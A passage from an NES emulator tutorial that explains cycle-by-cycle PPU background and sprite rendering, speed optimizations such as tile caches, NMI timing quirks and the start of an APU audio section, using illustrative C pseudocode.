//no rendering or anything ppu.on_screen = ppu.rendering = 0; else if (ppu.scanline == 241) { /* we are done with filling the frame buffer, render now */ display->render_frame(); ppu.reg[2] |= 0x80; //vblank /* It is known that the sprite register address 0x2003 gets changed during rendering, and somehow goes back to 0 when it is done with a frame, but so far, the cycle behavior isn't exactly known for how the reg 0x2003 gets changed during rendering, some games rely on this behavior ppu.reg[3] getting reset to 0 at the end of frame. */ ppu.reg[3] = 0; //reset spr addr cpu.nmi = ppu.reg[0] & 0x80; //set NMI //with this, we have 20 scanline of vblank for NTSC, //70 for PAL. } else if (ppu.scanline == ppu.end_scanline) { ppu.scanline = -1; ppu.rendering = ppu.reg[1] & 0x18; if (region == NTSC) //if ntsc first ppu scanline is 340 cyc ppu.short_scanline ^= 1; else ppu.short_scanline = 0; } } else if ((ppu.scanline < 0) && (ppu.cycle == 1)) { //vblank gets cleared a cycle later, thanks to nintendulator //for this information. ppu.reg[2] = 0; } /* execute code here if the PPU is rendering that is the scanline is < 240 and the bg or spr is set to render in 0x2001 */ if (ppu.rendering) { ppu_sprite_run(); //put it in a separate function for clearer //explanation switch (ppu.cycle) { //everything in here is related to the bg layer //the NES PPU has 2 layers, the BG and the SPRITE. /* This runs 34 times, (tiles, attribute tables, etc.) because there are 32 tiles to a scanline (256 horizontal pixels) and then 2 more tiles at the end for the next scanline since the PPU renders on *every* cycle (cycle 0 to 255). every tile is processed in 8 cycles before it restarts, showing the increments of 8 below, basically the steps are as follows, it takes 2 cycles to read a data that means 2 cycles for tiles, 2 cycles for attributes, 2 cycles for lo chr and then 2 cycles for high, making it a total of 8 cycles for each tile decompressed. */ case 0: case 8: case 16: case 24: case 32: case 40: case 48: case 56: case 64: case 72: case 80: case 88: case 96: case 104: case 112: case 120: case 128: case 136: case 144: case 152: case 160: case 168: case 176: case 184: case 192: case 200: case 208: case 216: case 224: case 232: case 240: case 248: case 320: case 328: /* This is why treg6 was shifted to the left 10 this acts the upper 10th and 11th bit, deciding the name table ppu.reg[6] will read from. (PPU should be allowed to wait at least one frame until you render Regs write to treg6 so it can get reloaded as we will see later reg[6] gets incremented during rendering. */ /* This is for the bg rendering get the tile address, all it does is get the name table address written in the lower 2 bits of 0x2000, then it gets then it gets the lower 0x3FF bytes where the tiles are stored, since the tiles are 32x30, it can use up to 960 (32*30) bytes, but why do we AND by 0x3FF? This is because the tile can be fetched from the attribute tables if the address of reg[6] (loopy_v is in that range */ //p_nt is a 4 pointer to array index to deal with //mirroring //get the tile, the tile is written to by the //programmer to the name table, (0x2000 to 0x2FFF) //this tells the PPU where to get the pattern table //later from. tile = ppu.p_nt[(ppu.reg[6] & 0xC00) >> 10] [ppu.reg[6] & 0x3FF]; break; case 1: case 9: case 17: case 25: case 33: case 41: case 49: case 57: case 65: case 73: case 81: case 89: case 97: case 105: case 113: case 121: case 129: case 137: case 145: case 153: case 161: case 169: case 177: case 185: case 193: case 201: case 209: case 217: case 225: case 233: case 241: case 249: case 321: case 329: //this gets the pattern address //using the tile we got a cycle earlier. pat_addr = (tile << 4) | (ppu.reg[6] >> 12) | ppu.bg_addr; break; /* As documented above, we know that each tile is 8x8 pixels, thus we shift (tile << 4) by skipping 16 bytes of data, since the lower 2 bits of the index that accesses the palette is stored in 2 different bytes 8 bytes away from each other, making each tile taking up 16 bytes each of 8 bits, for 8x8 pixels. The ppu.reg[6] >> 12 is known as the fine y, every scanline the ppu.reg[6] is incremented in the upper 12-14 bit, which goes from 0-7, this tells which scanline the PPU is on so it knows where to look, every value correspond to every next byte such so let us say bg_addr is one, and the tile is 0, then the value it takes is 0 to 7, which is pattern_table[0, 7]. As you can see here each byte in 16 byte format is going vertically down. Example: pattern_table[0] and pattern_table[8] contains the pixels for the first 8 pixels. pattern_table[1] and pattern_table[9] contains the first 8 pixels for the NEXT scanline, and so forth. The ppu.bg_addr in this case is the value we set in reg 0x2000, either 0 or 0x1000. this pat_addr tells the PPU where to get the pattern table data from. */ case 2: case 10: case 18: case 26: case 34: case 42: case 50: case 58: case 66: case 74: case 82: case 90: case 98: case 106: case 114: case 122: case 130: case 138: case 146: case 154: case 162: case 170: case 178: case 186: case 194: case 202: case 210: case 218: case 226: case 234: case 242: case 250: /* gets the attribute address, also get the attribute shift, since attribute_addr only gets the address of the attribute byte, and not which location of the 2 bits we want. So we get it using */ //attribute_shift which tells us how much we //need to right shift by to get it later. attribute_addr = ppu.render_addr = 0x23C0 | (ppu.reg[6] & 0xC00) | (attr_loc[ppu.reg[6] & 0x3FF]); attrib_shift = attr_shift[ppu.reg[6] & 0x3FF]; break; /* This gets the attribute address, which is the 64 bytes at the end of the name table, so the (0x23C0 | ppu.reg[6] & 0xC00) figures out which name table we are using, from ppu.reg[6] and then and it is looked up in a table for speed. The code to fill the attr_loc[] table and attr_shift_table[] is unsigned char attr_shift_table[0x400]; unsigned char attr_loc[0x400]; for (int i = 0; i != 0x400; ++i) { attr_shift_table[i] = ((i >> 4) & 0x04) | (i & 0x02); attr_loc[i] = ((i >> 4) & 0x38) | ((i >> 2)) & 7; } */ case 3: case 11: case 19: case 27: case 35: case 43: case 51: case 59: case 67: case 75: case 83: case 91: case 99: case 107: case 115: case 123: case 131: case 139: case 147: case 155: case 163: case 171: case 179: case 187: case 195: case 203: case 211: case 219: case 227: case 235: case 243: //this time we apply the attribute byte to the //pixel buffer render_addr = attribute_addr; //to make it more clear attribute = ((ppu.p_nt[(render_addr & 0xC00) >> 10] [render_addr & 0x3FF] >> attribute_shift) & 3) << 2; for (k = 0; k != 8; ++k) palette_index_buf[ppu.cycle+13+k] = attribute; if ((ppu.reg[6] & 0x1F) == 0x1F) ppu.reg[6] ^= 0x41F; else ++ppu.reg[6]; break; /* 1 attribute byte covers 8 tiles, but we are doing one tile at a time, so we get the 2 upper bits, and then copying the attribute pixel_buf to 8 pixels places since a tile is 8 pixels each. We add indedx+13 because we are starting from 16 (3 + 13), because the last 2 tile fetches happen at the end of a previous scanline fill the first 16 pixels of the current scanline so it can render, as the PPU renders a pixel per cycle. We increment the ppu.reg[6] because it is finished fetching the tile and the attribute, the increment acts as "fine x", allowing the next tile to be get on the next address, (tile = ppu.p_nt[(ppu.reg[6] & 0xC00) >> 10] [ppu.reg[6] & 0x3FF]) When it hits 31, that is when it is done drawing a scanline, since 8 * 32 = 256 pixels, it flips 0x41FF to reset the position back to 0, as 0x41FF is 0b10000011111, so it resets the 5 lower bits to reset the fine x to, the upper bit is used for mirroring. If we recall, 2000 write: t:xxxxABxxxxxxxxxx=d:xxxxxxAB t is treg6 in this case (0 = $2000; 1 = $2400; 2 = $2800; 3 = $2C00) If you recall the type of name table mirroring the NES has, you will find why this works, for horizontal mirroring 0x2000 and 0x2400 and 0x2800 and 0x2C00 points to the same data, if you write 0x2000 or 0x2400 then the "B" value will get set or not set, but when it gets flipped, horizontal mirroring ensures you still get the same data, as for 0x2800 and 0x2c00, this still works because 2 is 10b and 3 is 11b, so it will switch back and forth to locations that share the same data. As for vertical mirroring this works because 0x2400 is equal to 0x2c00, so when it flips you get the vertical mirroring you expected, the same logic applies for the other 3 addresses. Single screen mirroring need not to worry about this, since it all shares the same data, as for 4 separate name tables, it is assumed that the programmer know what they are doing and thus made the code fool proof to display the correct thing when it switches. */ case 323: case 331: //this time we apply the attribute byte to the //pixel buffer render_addr = attribute_addr; attribute = ((ppu.p_nt[(render_addr & 0xC00) >> 10] [render_addr & 0x3FF] >> attribute_shift) & 3) << 2; for (k = 0; k != 8; ++k) palette_index_buf[ppu.cycle-323+k] = attribute; if ((ppu.reg[6] & 0x1F) == 0x1F) ppu.reg[6] ^= 0x41F; else ++ppu.reg[6]; break; /* this is the last 2 attribute fetches for the next scanline, since the PPU render a pixel every cycle */ case 4: case 12: case 20: case 28: case 36: case 44: case 52: case 60: case 68: case 76: case 84: case 92: case 100: case 108: case 116: case 124: case 132: case 140: case 148: case 156: case 164: case 172: case 180: case 188: case 196: case 204: case 212: case 220: case 228: case 236: case 244: case 252: case 324: case 332: render_addr = pat_addr; /* this part is hardware based, the software part we already got pat_addr in cycle base, i guess there is some delay in the hardware before it starts reading it. Reading/Writing takes 2 cycles each. */ case 5: case 13: case 21: case 29: case 37: case 45: case 53: case 61: case 69: case 77: case 85: case 93: case 101: case 109: case 117: case 125: case 133: case 141: case 149: case 157: case 165: case 173: case 181: case 189: case 197: case 205: case 213: case 221: case 229: case 237: case 245: case 253: for (k = 0; k != 8; ++k) palette_index_buf[ppu.cycle+11+k] |= ( ((pattern_table[addr] >> (k ^ 7)) & 1); break; case 325: case 333: for (k = 0; k != 8; ++k) palette_index_buf[ppu.cycle-325+k] |= ( ((pattern_table[addr] >> (k ^ 7)) & 1) break; /* The same thing applies to these 2 cycles, but we subtract 325, because this is the last 2 tiles fetches I was talking about, they are for the next scanline to use */ /* We get the first lower bit from the pattern table address and OR it with the upper 2 bits from the address table */ case 6: case 14: case 22: case 30: case 38: case 46: case 54: case 62: case 70: case 78: case 86: case 94: case 102: case 110: case 118: case 126: case 134: case 142: case 150: case 158: case 166: case 174: case 182: case 190: case 198: case 206: case 214: case 222: case 230: case 238: case 246: case 254: case 326: case 334: render_addr = pat_addr | 8; break; /* This is for the other upper bit in the pattern table, it is 8 bytes apart from the 1st bit, so we OR it by 8 here. */ case 7: case 15: case 23: case 31: case 39: case 47: case 55: case 63: case 71: case 79: case 87: case 95: case 103: case 111: case 119: case 127: case 135: case 143: case 151: case 159: case 167: case 175: case 183: case 191: case 199: case 207: case 215: case 223: case 231: case 239: case 247: case 255: for (k = 0; k != 8; ++k) palette_index_buf[ppu.cycle+9+k] |= (((pattern_table[addr | 8] << 1) >> (k ^ 7)) & 2) ); break; /* This is the upper bit of the 2 bit plane that is in the pattern table. Now we have our index to access the palette */ case 327: case 335: for (k = 0; k != 8; ++k) palette_index_buf[ppu.cycle-327+k] |= (((pattern_table[addr | 8] << 1) >> (k ^ 7)) & 2) ); break; //The upper bit of the 2 bit plane that is in //the pattern table for the last 2 tiles. case 251: render_addr = attribute_addr; attribute = ((ppu.p_nt[(render_addr & 0xC00) >> 10] [render_addr & 0x3FF] >> attribute_shift) & 3) << 2; for (k = 0; k != 8; ++k) palette_index_buf[ppu.cycle+13+k] = attribute; if ((ppu.reg[6] & 0x1F) == 0x1F) ppu.reg[6] ^= 0x41F; else ++ppu.reg[6]; /* This is the same as above when applying the attribute data */ if ((ppu.reg[6] & 0x7000) == 0x7000) { tmp = ppu.reg[6] & 0x3E0; //reset tile y offset 12 - 14 in addr ppu.reg[6] &= 0xFFF; switch (tmp) { //29, flip bit 11 case 0x3A0: ppu.reg[6] ^= 0xBA0; break; case 0x3E0: //31, back to 0 ppu.reg[6] ^= 0x3E0; break; default: //inc y scroll if not reached ppu.reg[6] += 0x20; } } else //inc fine y ppu.reg[6] += 0x1000; break; /* This is when the PPU reset the fine y with ppu.reg[6] &= 0xFFF; if it reaches 7 to index pattern table properly again. (Remember, pattern table is indexed with ppu.reg[6] >> 12 so this clears the top bits which is fine y.) else, it increments fine y for the data to be get again for the pattern table to access. As for the switch case, bits 5 to 9 represents the y scroll value, and it gets incremented for every 8 fine y we do. It wraps back to 0 and then it flips bit 11 when it hits 29, (for horizontal mirroring it uses the other name table, for vertical mirroring, this doesn't affect it) because the NES height is 240, so 8*30 = 240, it fits the height, it is 29 because we count 0 as 1. There is a quirk however, that is if you write to PPU scrolling regs to modify the address then it goes back to 0, and bit 11 does not get flipped, else it gets incremented by 32, because the y scroll is at bit 5 to 9, and not 0 to 4. */ /* This is the sprite's turn to grab the data, since the PPU can do up to 8 sprites (32 bytes memory) it takes 8*8=64 cycles to do it. The grab is just like background, it goes from 256 to cycle 319 */ /* NOTE: these render_addr equals to was gotten from nintendulator information, since quietust and kevtris did a cycle by cycle reading of the PPU to figure out what exactly happens, I am not certain if this is what the PPU is actually reading back during these cycles. case 256: case 264: case 272: case 280: case 288: case 296: case 304: case 312: render_addr = 0x2000 | (ppu.reg[6] & 0xFFF); /* this is supposed to get the name table address for the title, but, the tile is stored in the 32 byte buffer, so we'll just leave the render_addr like this, since the memory map of that 32 byte is not accessible from a regular memory read, instead 0x2004 is the one that reads back what the sprite rendering is doing. */ break; case 257: ppu.reg[6] &= 0xFBE0; ppu.reg[6] |= (ppu.treg6 & 0x41F); render_addr = 0x2000 | (ppu.reg[6] & 0xFFF); /* this resets every x bits and the name table bits, and then reads back from the temporary reg written in $2005. This gives the new scanline a fresh start with the fine x*/ case 258: case 266: case 274: case 282: case 290: case 298: case 306: case 314: render_addr = 0x2000 | (ppu.reg[6] & 0xFFF); /* supposed to get attribute table, but we don't do it here because we got it in the 32 byte buffer. case 265: case 273: case 281: case 289: case 297: case 305: case 313: //get pattern table here, but we don't do //that either, because //its done during the fill case 259: case 267: case 275: case 283: case 291: case 299: case 307: case 315: pat_addr = sprite_pat_addr; //figure out the pattern address here break; case 260: case 268: case 276: case 284: case 292: case 300: case 308: case 316: render_addr = pat_addr; break; //copy pat_addr to render addr we have case 261: case 269: case 277: case 285: case 293: case 301: case 309: case 317: //copy attribute code here, and then apply //low chr. for (k = 0; k != 8; ++k) { spr_pixel_index_buf[ppu.cycle-261+k] = attribute code here; spr_pixel_index_buf[ppu.cycle-261+k] |= low chr here. } /* spr_pixel_index_buf is a 64 byte buf, since it is 8 tiles. (64 pixels) */ case 262: case 270: case 278: case 286: case 294: case 302: case 310: case 318: render_addr = pat_addr | 8; break; //get the hi chr now... case 263: case 271: case 279: case 287: case 295: case 303: case 311: case 319: for (k = 0; k != 8; ++k) spr_pixel_index_buf[ppu.cycle-261+k] |= hi chr here. break; case 336: case 338: render_addr = 0x2000 | (ppu.reg[6] & 0xFFF); break; case 337: case 339: break; case 340: break; /* Now one line of scanline has been complete, 341 cycles [0, 340] has been done. Another note, the render_addr = ... is not certain that the real NES reads like this, but it does adhere to the 2 cycles per fetch basis, also no games does sprites to this accurate fetching, one can just speed up the sprite code by writing all the sprite data at once at cycle 319, since we already have all the data by cycle 255. */ } //The PPU render a pixel every cycle, this is ran //when the PPU is on_screen and less than cycle 256 //(stil rendering that 256 horizontal pixels) if (ppu.on_screen && (ppu.cycle < 256)) { /* this checks if the background is visible, or the cycle is greater than 8, or background cliping is off reg 0x2001 can configure if the 8 pixels on the left of the screen can be displayed or not. */ /* Now we know enough to explain inc_x. Since 0x2005 affects scrolling, and the NES gets a tile a 16 byte chunks covering 8x8 pixels, there isn't a way to say I want to scroll starting from bit 6 (2nd pixel) on the first tile, so this is where inc_x comes in, it allows pixel granularity for scrolling, of width 8, because a byte is 8 pixels in the NES case. */ if (ppu.bg_v && ((ppu.cycle >= 8) || ppu.bg_clip)) index = ppu.palette_index_buf[ppu.cycle + ppu.inc_x]; //covering the inc_x too else index = 0; //if not, use master palette color. /* this code checks if the sprite is visible and no sprite clipping */ if (ppu.spr_v && ((ppu.cycle >= 8) || ppu.spr_clip)) { /* goes through the sprite (8 of them in total) to find the first sprite inline with the x coordinate as it is rendering */ for (k = 0; k < sprcount; k += 4) { tmp = k >> 1; //sprite's x pos j = ppu.cycle - ppu.sspr_data[0x20 | tmp]; if (j & ~7) //not in range, keep going continue; j = ppu.spr_buf[(k << 1) | j]; if (j) //the sprite is in range, figure out to //draw it or not. { /* If sprite 0 is in the scanline, figured out in sprite_run() and the background is visible and it the sprite found in range for the x position render is sprite 0, and the cycle is less than 255 (meaning sprite hit won't happen if the NES rendering the 256th pixel, and the index that is the bg is not transparent, (using the master palette color, we set a flag ppu.reg[2] |= 0x40. this is known as the sprite hit flag, and basically it is used for timing purposes to achieve scrolling effects. */ if (ppu.spr0inline && !k && ppu.bg_v && (ppu.cycle < 255) && index) { ppu.reg[2] |= 0x40; ppu.spr0inline = 0; } //if the sprite priority is greater than the bg //set in the sprite ram, we replace the index //with the sprite data instead of the bg, //we |= 0x10 because the sprite palette //address is //greater than the bg //do if sprite priority is greater than bg if (!(index && ppu.sspr_data[0x20 | (tmp | 1)])) index = j | 0x10; //OR by 0x10 since sprite palette is in //second row //found first opaque sprite break out //since lower priority is displayed in //front of higher priority break; } } } //if ppu is off, render from palette //0 or if $2006 is in 0x3FXX range //use that color if (!ppu.rendering) { if ((ppu.reg[6] & 0x3F00) == 0x3F00) index = ppu.reg[6] & 0x1F; } index &= ppu.grayscale; //deal with grayscale //set in 0x2001 index |= ppu.color_emphasis; //color emphasis //set in 0x2001. *ppu.p_pixel = ppu.p_palette[ppu.palette[index]]; //copy to the pixel buf ++ppu.p_pixel; } } } To sum it up, here is the shorten scanline rendering information. Scanline -1: We use the number -1 because this is an active scanline that fetches everything normally, for the 2 tiles at the end, what we don't want is the sprite to be in range for this scanline, thus, it is called scanline -1. Scanline to 0 239: The PPU renders 256x240 pixels here, as normal. Scanline 240: This is an idle scanline, the PPU seem not to be doing anything here. Scanline 241 to 260 for NTSC, 310 for PAL: This is VBLANK time, a time when the electron gun repositions itself at the top, the PPU will make no memory accesses or change the address for 0x2006, thus the programmer can write to the PPU safely here. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++Code Optimizations for the PPU++++++++++++++++++++++++++++++ Now that we know what the PPU does cycle by cycle, we can obviously take a few shortcuts, first and foremost, the main speed hindrance is the sprite_run() code. To write this code, means you need to write a state machine, one with many conditionals, when I first started writing this using conditionals, I think the speed hit was 20 to 30 fps. If you want this kind of accuracy, what you can do is inline the sprite fetches inside the cycle cases, and to change states, you can use function pointers to implement "state changes". There is still speed losses however, since *most* games do not rely on cycle accurate sprite behavior, you can get away with doing little sprite logic, and just figuring out all the data at the end of the background rendering, at cycle 256, in a loop, with no state machine needed. The state machine is just there to emulate the hardware. For the games that do rely on 0x2004 readings (Micro Machines) that need accurate cycle behavior, what you can do is write the 0x2004 code so that when its read, and the PPU is rendering, it runs from *START* to the the current cycle we are on, this is not a problem because games rarely read from 0x2004 during rendering. Another way is to take advantage of the deterministic behavior by taken over the reg 0x2003/0x2004/0x4014 writes to predict what will be returned. I recommend the catch up method, it is the easiest one to impelement, and it is not too slow, the deterministic method needs alot of accurate timing and figuring out. ======Optimized cycle by cycle PPU run state machine====================== switch (ppu.cycle) { case 0: 1: 2: //so on... spr_buff[ppu.cycle>>1] = 0xFF; //we init it to 0xFF at the //beginning case 64: //reset all the sprite variables needed to work out the sprite. spr_count = 0; //how many sprite are in this scanline.... //so on sprite_fp_run = sprite_y_logic; sprite_fp_run(); start the state machine... case 65: } void sprite_y_logic() { if (sprite_is_in_scanline) sprite_fp_run = sprite_fetch; } void sprite_fetch() { //fetch sprite here } ========================================================================== ==============Catch up method============================================= u8 rd_reg2004() { sprite_run(up_to_the_cycle_we_are_on_from_start_cycle) return data; /* we can optimize this further by keeping a variable that tells what cycle we just finished at so if 0x2004 is read again before the scanline ends, we don't have to do it at the beginning again. We need to reset this variable on every new scanline though */ } ========================================================================== =============Deterministic method========================================= void wr_reg2003() { //figure out where the first 2 sprite is read, etc. } void wr_reg2004() { //figure out what sprites are written to, the information etc. //and save it to a buffer. } void wr_reg4014() { //same thing as reg2004, but we need to figure out on a 256 byte //data basis, rather //than 1 like reg2004. } We can also predict the timing of sprite overflow and sprite hit due to their deterministic behavior, those should work the same way. =========Tile Caches====================================================== We can speed up the copying of data process by storing the tiles in a manner that is native to our program, here is one way to do it, thanks to Disch for this method. void build_chr_cache(u8 *src, u8 *dst, size_t len) { //using the trick by disch, thanks! //trick is to //make it these values so don't have to //use comparison and OR to get attribute //can just AND it const u8 chr[] = { 0x00, 0xFD, 0xFE, 0xFF }; u8 p; size_t i, k, j, c; for (c = i = 0; i < len; i += 16) { for (j = 0; j != 8; ++j) { for (k = 0; k != 8; ++k) { p = (src[j] >> (7^k)) & 1; p |= ((src[j|8] << 1) >> (7^k) & 2); dst[c++] = chr[p]; } } src += 16; } } the idea store the CHR-ROM on start up into a memory space where the bytes has already been ORed for you. So during run time, you don't need to do it. This works well for CHR-ROM because the pattern table doesn't change, for CHR-RAM we could also use this method, because changes to the rendering don't happen nearly as often as the time spent rendering. void update_chr_cache(int addr, u8 data) { static const u8 chr[] = { 0x00, 0xFD, 0xFE, 0xFF }; int j, t; //if hi chr address //make it low chr address j = (addr & 8) >> 3; addr = pat_addr_lut[addr]; /* addr = ((addr << 3) & 56) | ((addr & 0xFFF0) << 2); */ t = 2 - j; cpt[addr] = chr[(cpt[addr] & t) | ((data >> 7 << j) & (j+1))]; cpt[addr | 1] = chr[(cpt[addr | 1] & t) | ((data >> 6 << j) & (j+1))]; cpt[addr | 2] = chr[(cpt[addr | 2] & t) | ((data >> 5 << j) & (j+1))]; cpt[addr | 3] = chr[(cpt[addr | 3] & t) | ((data >> 4 << j) & (j+1))]; cpt[addr | 4] = chr[(cpt[addr | 4] & t) | ((data >> 3 << j) & (j+1))]; cpt[addr | 5] = chr[(cpt[addr | 5] & t) | ((data >> 2 << j) & (j+1))]; cpt[addr | 6] = chr[(cpt[addr | 6] & t) | ((data >> 1 << j) & (j+1))]; cpt[addr | 7] = chr[(cpt[addr | 7] & t) | ((data << j) & (j+1))]; //with CHR-RAM, you can call this function whenever 0x2007 is used //to write to the pattern table. } With the data stored this way, whenever we use the attributes, we can just AND instead of doing something like if (index) apply_attribute(); (Remember, the lower 2 bits determine if the bg is to be using a color at all, attribute gets applied only if the index from the 2 bit in the pattern table isnt 0) With this method, we can just index & attribute since we fill the decoded pattern table into the tile cache as 0x00 as 2 lower bit 0b, 0xFD with 01b, 0xFE 10b, 0xFF 11b, we can just AND out all the upper bits by doing it this method. There are many other techniques for tiling, play around with it a little. If you don't mind a little portability loss and some extra code for endian checking, you can access the tile cache buffer using a short pointer (16 bit), long pointer (32 bit machine) or long long pointer (64 bit) to copy the data from the tile buffer to the pixel buffer, so we don't copy byte by byte. Applying the attribute table can also be done that way with a lookup table, we take advantage of how the attribute is the same for 16 pixels, we can make a lookup table that copy native word size, 4 bytes at a time. Here is an example for 32 bit. static const unsigned long attr_lut[] = { 0x30303003, 0x70707007, 0xB0B0B0B, 0xF0F0F0F, }; We AND this table with the tile buffer to get our index for 4 pixels at a time. Obviously we can adjust it to any other native word size. Another method I found cool is blargg's method. Thanks to blargg for writing about this, his words are below: In my emulator I render graphics to an offscreen graphics buffer with 8 bits per pixel. I use palette entries 32-63 for the 32 NES palette entries, leaving room for the host system at the beginning of the palette. The cached CHR data is just a reordering of the original data to allow shifting and masking to quickly generate the 8-bit-per-pixel format. This keeps the cached data to a minimum size, lessening impact on the host's processor cache. There is also a separate cache with pixels horizontally flipped. Each cached tile consists of four pairs of lines, and each pair is stored in a 4-byte integer. The 2-bit pixels for the two lines are reordered in the cache to allow for quick extraction: Code: 12345678 CHR pixels (2 bits per pixel) ABCDEFGH A1E5B2F6C3G7D4H8 Cache (4 bytes) -1---2---3---4-- Masked pixels ---5---6---7---8 A---B---C---D--- --E---F---G---H- uint32_t* pixels = ... // pixel buffer to draw into uint32_t mask = 0x03030303; // mask to extract pixels int attrib = 2; // attribute bits (0-3) uint32_t offset = (8 + attrib) * 0x04040404; // distribute to 4 pixels uint32_t pair = *cache++; // read pair of lines from cache pixels [0] = ((pair >> 4) & mask) + offset; // extract pixels 1234 pixels [1] = ((pair >> 0) & mask) + offset; // extract pixels 5678 pixels += pitch; // next line pixels [0] = ((pair >> 6) & mask) + offset; // extract pixels ABCD pixels [1] = ((pair >> 2) & mask) + offset; // extract pixels EFGH pixels += pitch; // next line On a 64-bit CPU, groups of four lines (rather than two) could be stored in each cache word, doubling the performance. To handle masked graphics, the mask can be efficiently calculated from the pixels by subtracting the base pixels (before offset) from 0x80808080 and shifting right by 2. The result will have the lower 5 bits clear for transparent pixels and set for opaque pixels; the upper bits don't matter because those are always zero. For example, (0x80808080 - 0x02030001) >> 2 = 0x1F9F601F. Code: uint32_t bg = *pixels; // get background pixels uint32_t sp = (line >> 4) & cache_mask; // extract sprite pixels uint32_t mask = 0x80808080 - sp; // calculate mask *pixels = ((sp + offset) & mask) | (bg & ~mask); // combine sprite and background For completeness, here is a function that converts CHR data to the cached format: Code: // Expands each of the 8 bits in n into separate nybbles of result. // In: 12345678 Out: 0x15263748 uint32_t expand( uint32_t n ) { // 12345678 // 12345678 // 12345678 // 12345678 // ---1---5---2---6---3---7---4---8 return ((n << 21) | (n << 14) | (n << 7) | n) & 0x11111111; } void convert_tile( const uint8_t* chr, uint32_t* cache ) { // convert one chr tile to a cached tile for ( int n = 4; n--; ) { *cache++ = (expand( chr [0] ) << 0) | (expand( chr [8] ) << 1) | (expand( chr [1] ) << 2) | (expand( chr [9] ) << 3); chr += 2; } } ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++PPU NMI quirk+++++++++++++++++++++++++++++++++++++ There are some quirks to the NMI. Reading memory mapped register 0x2002 within one PPU clock before VBLANK reads it as NMI never occured, and it will not generate NMI for that frame. Reading it on the same clock that the NMI is generated reads it as set, clears it, but NMI is never triggered for that frame. Reading 2 or more PPU clocks before or after it is set behaves normally. Writes to the 0x2000 (PPUCTRL) during vblank that turns on 0x80 (generate nmi in vblank) bit, you can cause NMIs to be generated. There is also a 1 cycle NMI delay when PPUSTATUS (0x2002) bit 7 gets set in vblank. =======NMI quirks Example================================================= u8 read_2002() { /* NMI behavior for the 0x2002 this is not the full behavior of this reg, the code included affects NMI. NMI behavior for 0x2002 NMI gets set in ppu_run() at cycle 0 of 241 The ppu_run is called before the memory read. this is in ppu cycles this use scanline number -1 to 261 (reset when it hits 261) */ u8 tmp = ppu.reg[2]; //resets NMI too if (tmp & 0x80) //vblank started, reset everything except spr0 hit tmp &= 0x60; if (ppu.scanline == 241) //finished drawing everything, in VBLANK { if (ppu.cycle == 0) //as we can see, reads back as false. tmp &= ~0x80; if (ppu.cycle < 3) cpu.nmi = 0; //within 2 clocks cycles when NMI is set //reading this turns off nmi. //and since NMI is triggered at the end //of an opcode, NMI never happens, because //reading 0x2002 is using one of the opcodes //to do it. (LDA/LDX/LDY etc) } return tmp; } void write_2000(u8 data) { //NMI behavior for reg 0x2000 //same scanline numbers for this as 0x2002 //not full behavior of the reg, only NMI stuff included here //setting NMI on vblank (data & 0x80) //and the PPU is in vblank (ppu.reg[2] & 0x80) //and the 0x2000 reg is not currently using //NMIs can generate an NMI if ((data & 0x80) && !(ppu.reg[0] & 0x80) && (ppu.reg[2] & 0x80)) cpu.nmi = 1; // writing within a few cycles (2 cycles) // to disable nmi after vblank to // set NMI can disable it if ((ppu.scanline == 241) && !(data & 0x80) && (ppu.cycle < 3)) cpu.nmi = 0; ppu.reg[0] = data; } ========================================================================== +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -------------------------------------------------------------------------- -------------------------------------------------------------------------- V. APU (Audio Processing Unit) The APU is the sound unit in the NES, it runs at the same clock rate as the CPU, as it lies on the CPU. The APU has 5 channels for generating sound. The 5 are the 2 pulse wave channels, 1 triangle, 1 noise channel, and 1 DMC channel (used to play DPCM). The APU outputs a sample every cycle, making it output ~1789772 samples a second. The pulse waves channel can has sweep capabilities (adjust the channel's period up or down), able to silence the channel, volume (envelope), and and frequency control. It also has a length counter that can be used to implement fade effects, and silence the volume when its counter reaches 0. It can make either a rectangle or square wave due to the sequence it outputs. To figure out the frequency range of the square wave, we figure out the lowest and highest period of the wave, the highest for a square wave is the one with 8 as the raw timer (square wave uses the timer as (8 << 1) + 2) so 18 cycles is when the sequencer will change, we also halt the length counter to stop it from changing the sequencer output, and the sequencer loops back 8 times, giving us CPU_FREQUENCY/(CYCLE_PER_SEQUENCE*SEQUENCE_PERIOD) 1789772/(18*8) = ~12429 Hz, while the lowest frequency is 1789772/(4096*8) = ~54.62 Hz (raw timer is 0x7FF the timer is 11 bits wide) Both pulse channels are identical in every way except it's sweep unit covered later. The triangle channel outputs a triangle waveform, if that wasn't obvious. The channel has no volume control, although you can control it's frequency. It constantly outputs a decreasing and increasing volume. IE: 15, 14, 13....13, 14, 15 That makes a triangle shape waveform. The values is made by the sequencer unit). The timer clocks the sequencer to move to the next value, and the length counter can halt the sequencer, there is also a linear counter which offers higher resolution for the halting of the sequencer. We use the same frequency to calculate the lowest frequency and highest frequency range. 1789772/32 = ~55930.4 Hz is the highest, while 1789772/(2048*32) = ~27.31 Hz is the lowest frequency range. The noise channel is a LSFR (linear shift feedback register), that generates a pseudo random number sequence used for "noise". It has a frequency influence register on the channel, and outputs the envelope written to a register when bit 0 of the 16 bit wide shift register is set. More will be covered on that later. While it is a noise channel, you can figure out the lower and upper range of the frequency it emits, since I am not certain how to do this, I will give the number Brad Taylor figured out, 29.3 Hz to 447 KHz. Kevtris told me that you can measure the frequency range by digitize the output of the noise channel, and then check with the LFSR that generates it to see the cycle count. The last channel of the NES is the DMC (Delta Modulated Channel). This channel can play samples based waveform written by the programmer. It can hold 8 bits of sample at a time, and sends a 7 bit output to the APU mixer. It has a timer which influences the frequency it will be played, and it can generate an IRQ at the end of playback. ++++++++++++++++++++++Terminology+++++++++++++++++++++++++++++++++++++++++ Before we continue here is the terminology for these units. Clock: A "clock" in the APU is when a unit outputs/modify it's own or other unit behavior. It is implemented in the form of a counter that counts down, and when it hits to 0, it outputs a "clock", or change the behavior of it's own or other units. Divider: A divider is a form of counter that ouputs a "clock", every N input clocks, the N input clocks is clocked by the timer, when the timer clocks the divider, the input clock goes down, when it hits 0, it outputs a clock. Duty Cycle: A duty cycle is the percent of time the unit is in an active state, that is, when it is outputting a volume. For example, a 50% duty cycle in an 8 sequence outputs 4 1s and 4 0s while a 25% is 2 1s and 6 0s. Due to how phase inversion, a 75% cycle should sound the same as a 25% one, because it is a 180 degree shift. Envelope: The volume of the waveform. Sequencer: The sequencer loops through an array of values for output, it is clocked, it increments and output a new value in the array, and loops back around when it is at the last element of the array. 